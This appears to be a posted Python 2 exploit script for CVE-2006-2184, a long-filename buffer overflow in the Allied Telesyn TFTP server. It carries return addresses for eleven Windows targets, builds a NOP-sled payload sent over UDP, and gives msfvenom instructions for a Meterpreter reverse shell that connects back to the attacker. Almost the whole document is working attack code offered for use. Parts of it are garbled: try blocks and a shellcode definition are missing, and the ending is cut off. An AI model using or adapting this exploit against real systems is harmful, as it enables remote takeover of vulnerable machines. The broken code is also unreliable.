11/8/2017 - 9:34 PM

Modified version of CVE-2006-2184 python script found here:

Modified version of CVE-2006-2184 python script found here:

#!/usr/bin/env python

import sys
import struct
import socket as so

print '#######################################################################'
print '#  CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow    #'
print '#  This is a modified version of Re4son\'s code                        #'
print '#    (                #'
print '#  The return addresses are ported from metasploit module             #'
print '#    exploit/windows/tftp/attftp_long_filename                        #'
print '#######################################################################\n'

# Shellcode - Staged Meterpreter Reverse TCP (NONX)
# Badchars: \x00
# StackAdjustment: -3500
# Payload size: 210 bytes
# Generation instructions:
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST= LPORT=443 \
#     -a x86 --platform Windows -e generic/none -f raw >> payload
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c

def set_return(target):
    if target == '1':
        print '[+] Selecting target: Windows NT SP4 English'
        retaddr = struct.pack('<L', 0x702ea6f7)
    elif target == '2':
        print '[+] Selecting target: Windows 2000 SP0 English'
        retaddr = struct.pack('<L', 0x750362c3)
    elif target == '3':
        print '[+] Selecting target: Windows 2000 SP1 English'
        retaddr = struct.pack('<L', 0x75031d85)
    elif target == '4':
        print '[+] Selecting target: Windows 2000 SP2 English'
        retaddr = struct.pack('<L', 0x7503431b)
    elif target == '5':
        print '[+] Selecting target: Windows 2000 SP3 English'
        retaddr = struct.pack('<L', 0x74fe1c5a)
    elif target == '6':
        print '[+] Selecting target: Windows 2000 SP4 English'
        retaddr = struct.pack('<L', 0x75031dce)
    elif target == '7':
        print '[+] Selecting target: Windows XP SP0/1 English'
        retaddr = struct.pack('<L', 0x71ab7bfb)
    elif target == '8':
        print '[+] Selecting target: Windows XP SP2 English'
        retaddr = struct.pack('<L', 0x71ab9372)
    elif target == '9':
        print '[+] Selecting target: Windows XP SP3 English'
        retaddr = struct.pack('<L', 0x7e429353) # ret by c0re
    elif target == '10':
        print '[+] Selecting target: Windows Server 2003'
        retaddr = struct.pack('<L', 0x7c86fed3) # ret donated by securityxxxpert
    elif target == '11':
        print '[+] Selecting target: Windows Server 2003 SP2'
        retaddr = struct.pack('<L', 0x7c86a01b) # ret donated by Polar Bear
        print '[-] Target not supported or invalid target specified!'
    return retaddr

def build_payload(shellcode, retaddr, lhost):
    # Let's build the payload
    print '[+] Constructing payload.'
    # Create NOP sled to brin NOPs & LHOST to 25 bytes
    nops = "\x90" * (25 - len(lhost))
    tail = ""                           # tail from metasploit
    tail += "\x83\xc4\x28\xc3"          # add esp, 0x28 / ret
    tail += "\x00netascii\x00"          # Finish as expected by the AT TFTP server
    payload = "\x00\x02" + nops + shellcode + retaddr + tail
    return payload

def send_packet(payload, rhost, rport):
    # Declare a UDP socket
    s = so.socket(so.AF_INET, so.SOCK_DGRAM)
    print "[+] Delivering package..."
        s.sendto(payload, (rhost, rport))
    except OSError:
        print "[-] Could not connect to " + rhost + ":" + str(rport) + "!"
    print "[+] Package delivered!"

def main():
        RHOST = sys.argv[1]                 # Target IP address as command line argument
        RPORT = int(sys.argv[2])            # Target Port as command line argument
        LHOST = sys.argv[3]                 # Attackers IP address
        TARGET = sys.argv[4] if len(sys.argv) > 4 else '10'    # The target system
    except IndexError:
        print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0]
        print '[-] Example: %s 69' % sys.argv[0]
        print '[-]'
        print '[-] Available Targets (* = Default):'
        print '[-]     1 - Windows NT SP4 English'
        print '[-]     2 - Windows 2000 SP0 English'
        print '[-]     3 - Windows 2000 SP1 English'
        print '[-]     4 - Windows 2000 SP2 English'
        print '[-]     5 - Windows 2000 SP3 English'
        print '[-]     6 - Windows 2000 SP4 English'
        print '[-]     7 - Windows XP SP0/1 English'
        print '[-]     8 - Windows XP SP2 English'
        print '[-]     9 - Windows XP SP3 English'
        print '[-]  * 10 - Windows Server 2003'
        print '[-]    11 - Windows Server 2003 SP2'

    RETADDR = set_return(TARGET)
    send_packet(PAYLOAD, RHOST, RPORT)

if __name__ == '__main__':